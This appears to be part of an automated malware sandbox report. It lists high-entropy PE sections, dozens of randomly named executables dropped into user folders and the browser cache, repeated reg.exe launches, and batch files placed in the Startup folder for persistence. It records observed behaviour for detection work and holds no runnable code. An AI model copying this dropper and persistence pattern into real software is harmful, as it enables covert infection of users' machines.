                  Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.drStatic PE information: section name: entropy: 7.284719044401107

                  Persistence and Installation Behavior

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\JEeghWLvEc5NBgQe7cVxX86V.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exeJump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile created: C:\Users\user\Pictures\360TS_Setup.exe (copy)Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\zl9WjeKTxMy8k8EbTBZdpElC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\VEH3hOo7SH8Curivn14XA2XL.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\cbVkxkkdr6gAwr3ezrvUlIvw.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\QAuG4M9OCXilplKuXEar6ygd.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\oZEH3cHEU5SysFjbUbbRDrah.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\GEHqSaIn1rPu3OTaMO2vs7UL.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\o2i3jroi23joj23ikrjokij3oroi[1].exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\zPFKv97tg3hm10kOTWpULC1K.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\5FLQaCVJzPf4A255tfj9dVCh.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\j19ppip6hQlQefTQJUWb1E5Y.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\3wIIRe1QiHmGmyDfkt1MdfjR.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\04MMWMll6oQNYP44niQAKG8f.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\timeSync[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\iuDvaF9Di8V3GPfVdVsLOQc6.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\IMmyv1eSkv8WoF4sKRLh3j87.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\vzNIVOaxf0vNgO94DAC9jWgi.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\bash.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\b7ii2eIKHIFqIN8jVgqT5jFD.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ED0F.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\O6FJxszjCn1zgUzc3ngkew5Q.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\PkqGBlFfXQGSePxTvCIfv7cw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\xCvbsgibKaoe0JrKdFZUHTO3.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\H0hJPxhIO3F6BQNxVzuoHmfd.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\EXHYoUWbk2EtGfzPiFxOh4fX.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\gX97xQ1DxOEiWzmKIb4DOJWg.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\Lxz6buRp1tzgPd3mYM1t5mGJ.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\A6Q2KMdnce3aBm1K21Xc0zdR.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\niko[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile created: C:\Users\user\AppData\Local\Temp\{F0567900-3BBD-4439-A130-BA90A759BDE5}.tmp\360P2SP.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\oabRgCI78gjFIFXr0JEwCrFT.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hvfsedhJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\i3ScmbyFMAYvi3d3SI8x4eUU.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\rCs1RclDFMYQLymrwE3zboPd.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FFE8.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\AFlhDPRBYXSdsXlIscLwpPBI.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\qoBVbpyFWm3cPk1EQ0W4FQFR.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\PBZVagSpvy50LOBQHCjW6qX9.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Y01cK2OJgtSKgzCj2OAQkixL.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\oNUrhYTToLZiF7IoGm0L0Ir9.exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\notepad.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\z7qYuSNnmN1T20mVDPQyJKNf.exeJump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile created: C:\Users\user\Pictures\360TS_Setup.exe.P2PJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\XxYZdepnteJj9ehuEwVshtV3.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\pkc9Yy7eyXDNxjrdaLkXC1Nw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\hmtNBhlQWScQGAc2r9fH2laz.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\M5ZhHB9e1LKNIZlvmmjrpriI.exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\atieah64.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\8ew1ueXT5mhwmZG4bTyHf7GY.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\m1SrljFNqYeH3vArtbYAaVjK.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\COdFyPiBcHZ6gr6RgSEauTsj.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\xHjBfoMXM1Bms4i9lirVpf5B.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\w0LUzqfajtYxxu1NAEZFwfRY.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\v0F2dmnMQ8GuOxPTeGs09I9Y.exeJump to dropped file
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeFile created: C:\Users\user\lgX7lgUL1w.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\bVGflEGYToK4vU6iMb86uQ6v.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\auditpol.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup294[1].exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\Y8VzUT8xWp3WAsPKChchuKQ1.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\6up3Hll278RsXeDsUnv7AmsU.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\LAD11vkv57kHfnlhAFxxWdEz.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\aqGWEPmkK0B9sJyfEBtpOpuJ.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeFile created: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\JRzNWYaVkGhoqBVKINyNWHZb.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\ByzLwX6bBzV9uMer6vLaibLq.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\oURwiane2EFilQ46IVStlZR3.exeJump to dropped file
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeFile created: C:\Users\user\lgX7lgUL1w.exeJump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile created: C:\Users\user\Pictures\360TS_Setup.exe.P2PJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hvfsedhJump to dropped file

                  Boot Survival

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeFile created: C:\Users\user\lgX7lgUL1w.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CpI1BxUwX4GXv0UQgqj98YFq.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dH9ICyXokcwnq5IDiow3vkKB.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Ub2k1IJ2t5gUNZveaJnsLim.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfz7DVXioZ89NNQKMlyzk5D1.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uM7NrUar2CHMPPLhTaEGJaiv.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KovXimwlIyW3P77uFXo41ye.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TH2edQjI5N96cctLqxcxRWB4.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tEJmB2nPjyQy45rj4ea5hhl3.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRYDXj1XORWa1yGwgqL1xUtR.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BsDz5LTErOmd8yNfyBTmMVUZ.batJump to dropped file
